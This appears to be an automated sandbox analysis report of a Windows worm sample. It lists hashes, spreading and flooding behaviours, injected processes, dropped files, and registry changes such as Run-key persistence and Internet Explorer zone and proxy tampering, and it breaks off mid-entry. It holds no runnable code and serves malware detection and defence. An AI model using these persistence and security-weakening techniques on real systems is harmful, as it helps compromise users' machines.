Trojan.Win32.Yakes.fdil (Kaspersky), Gen:Variant.Graftor.144415 (B) (Emsisoft), Gen:Variant.Graftor.144415 (AdAware), Backdoor.Win32.Farfli.FD, Worm.Win32.Dorkbot.FD, mzpefinder_pcap_file.YR, Sinowal.YR, WormDorkbot.YR, GenericUDPFlooder.YR, GenericIRCBot.YR, GenericMSNWorm.YR, GenericUSBInfector.YR, GenericDNSBlocker.YR, GenericDownloader.YR, GenericAutorunWorm.YR, GenericSYNFlooder.YR, GenericInjector.YR, BankerGeneric.YR, GenericProxy.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)Behaviour: Banker, Trojan, Backdoor, Flooder, Worm, WormAutorun, IRCBot, MSNWorm, DNSBlocker, UDPFlooder, SYNFlooder, Trojan-Proxy, USBInfector
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 0507408aeba6e089914234e07c5c820d
SHA1: 0176fd0f20f9884bec821083d91698255bae88f4
SHA256: 8ebd76d9305d5c702564a8791b2bdca49706e422d9ee37ae90b105abafee07aa
SSDeep: 1536:QPO20w4Ho0wPZYXpUsg/59Tf2OtavEtAtFFFFFFF5xWWAQ 53E/igGG:wBaUsC59Tf2uavEtAtFFFFFFF5sWDUUr
Size: 97792 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-06-14 21:16:31
Analyzed on: WindowsXP SP3 32-bit
Summary: Worm. A program that is primarily replicating on networks or removable drives.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer. |
IRCBot | A bot can communicate with command and control servers via IRC channel. |
MSNWorm | A worm can spread its copies through the MSN Messanger. |
DNSBlocker | A program can block designated DNS servers for making it difficult for users to locate specific domains or web sites on the Internet. |
UDPFlooder | This program can make a UDP flood. A UDP flood attack is a denial-of-service attack using the User Datagram Protocol (UDP). It can be initiated by sending a large number of UDP packets to random ports on a remote host. |
SYNFlooder | This program can make a SYN flood. It is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic. |
Trojan-Proxy | This program can launch a proxy server (SOCKS4) on a designated TCP port. |
USBInfector | A program can register a device notification with the help of RegisterDeviceNotification. So it is notified when a USB device is plugged and then the worm copies itself to the USB device plugged into the affected computer. |
Process activity
The Worm creates the following process(es):
ngggg.exe:1096
ngggg.exe:1596
ngggg.exe:912
calc.exe:3372
zthzjntzphj.exe:3036
%original file name%.exe:1984
dqqq.exe:180
vuxrwahifpa.exe:3788
vuxrwahifpa.exe:3272
vuxrwahifpa.exe:2984
bpihytyvgix.exe:2996
sppp.exe:3284
sppp.exe:2528
bett.exe:1580
bett.exe:1672
The Worm injects its code into the following process(es):
imapi.exe:1264
vmacthlp.exe:920
calc.exe:1160
notepad.exe:1520
svchost.exe:884
jqs.exe:348
winlogon.exe:708
services.exe:752
svchost.exe:948
svchost.exe:1016
svchost.exe:1100
svchost.exe:1148
svchost.exe:1192
spoolsv.exe:1440
Explorer.EXE:1912
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process ngggg.exe:1096 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\c731200 (1281 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ngggg.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dqqq.exe.gonewiththewings (0 bytes)
The process calc.exe:1160 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\c731200 (9 bytes)
The process %original file name%.exe:1984 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ngggg.exe (9505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bett.exe (62128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\dq[1].exe (21775 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dqqq.exe (12735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\spm[1].exe (43891 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ng[1].exe (33073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bet[1].exe (70237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sppp.exe (33910 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ngggg.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sppp.exe (0 bytes)
The process vuxrwahifpa.exe:3272 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\c731200 (1281 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ngggg.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bpihytyvgix.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vuxrwahifpa.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\zthzjntzphj.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Application Data\c731200 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sppp.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dqqq.exe.gonewiththewings (0 bytes)
The process bett.exe:1672 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\My Documents\My Videos\Desktop.ini (312 bytes)
The Worm deletes the following file(s):
%Program Files%\Common Files\CreativeAudio\desktop.ini (0 bytes)
Registry activity
The process ngggg.exe:1096 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 2E B1 8F F1 7C 37 B6 2E B7 50 D2 C0 62 93 54"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process ngggg.exe:1596 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 A3 EE 4D 66 CC 58 BD C5 50 33 27 FA EE 17 32"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process ngggg.exe:912 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 C7 48 65 58 B0 C5 57 59 1A 61 04 FC 52 10 84"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process calc.exe:1160 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 4F B3 5E CC 5D CC 76 9D 9B D0 4A D1 09 C3 BA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Classes\CLSID\{6F9A5753-0A29-1B4E-BE6B-6AD96FE75E1E}\0E7302EC\CW1]
"1160" = "88 00 00 00 EC 09 00 00 8D F1 A2 00 4C 01 02 00"
The process calc.exe:3372 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 03 A1 40 04 7E 4A A4 0F CF 3C 26 4B 13 23 5C"
The process notepad.exe:1520 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F F1 6B CB 5F 10 56 81 D8 22 A9 A1 5B 49 BD 27"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
To automatically run itself each time Windows is booted, the Worm adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Uukmkg" = "%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process zthzjntzphj.exe:3036 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 76 11 6E F8 B4 CC A0 AF 6F 34 4C D6 18 AE DA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process %original file name%.exe:1984 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 54 EE E7 C3 47 FC 22 8A 66 11 F2 AA EF 0F CB"
[HKCU\Software\Classes\CLSID\{6F9A5753-0A29-1B4E-BE6B-6AD96FE75E1E}\0E7302EC\CW1]
"1984" = "88 00 00 00 B4 04 00 00 8D F1 EB 00 EE 00 0C 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process dqqq.exe:180 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 58 FD 8B E6 27 93 15 0E AF 5A 1D 04 A1 DE A8"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\CLSID\{6F9A5753-0A29-1B4E-BE6B-6AD96FE75E1E}\0E7302EC\CW1]
"180" = "88 00 00 00 34 0A 00 00 8D F1 98 00 50 01 02 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process vuxrwahifpa.exe:3788 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 AF F4 AB 4E 64 74 6F A3 F4 24 E3 0A 80 F5 77"
The process vuxrwahifpa.exe:3272 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A EE 25 47 2B 02 77 C5 94 CB 87 F3 7D D4 95 C7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process vuxrwahifpa.exe:2984 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 3D 07 01 6E C4 B9 47 8A 60 27 41 B5 E9 78 71"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process bpihytyvgix.exe:2996 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 07 71 EC BA 4C 91 51 E6 8F 20 64 C8 FE 80 35"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process sppp.exe:3284 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 5A 26 2D 8E DE 48 E1 F7 73 DC 8A 73 16 9B 7C"
[HKCU\Software\VRTWatchdog]
"PerfData" = "31 30 30 36 36 34 39 36 33 33 33 35 31 32 35 35"
To automatically run itself each time Windows is booted, the Worm adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicrosoftPerfWD" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\sppp.exe"
The process sppp.exe:2528 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA A6 E1 34 34 27 6E C1 04 CD 4A FF 2C 49 B6 BE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process bett.exe:1580 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 0E 8D 6F 3B 0D 31 A2 E9 96 4D 2E 74 8D 5D 2B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process bett.exe:1672 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB 7F A2 26 03 06 B3 9E FA 33 39 8E 48 99 35 E2"
[HKCU\Software\Win7zip]
